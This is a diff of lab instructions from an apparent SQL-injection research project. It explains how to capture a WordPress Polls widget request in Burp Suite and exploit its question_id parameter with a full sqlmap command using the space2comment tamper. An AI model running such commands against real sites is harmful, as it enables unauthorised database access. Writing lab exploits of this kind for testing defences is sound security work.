BUseclab/SQLBlock/wordpress.md

 - After observing the request in Burp suite, you can right-click and use the "save to file" option to save the request for submitting an answer to the poll.

 To exploit the vulnerability in Polls widget you can use the following command.
-Note that you should replace the "path_to_saved_requset".
+Note that you should replace the `path_to_saved_requset`.

 ```bash
 ./sqlmap-dev/sqlmap.py --flush-session -r %path_to_saved_request% -p question_id --tamper space2comment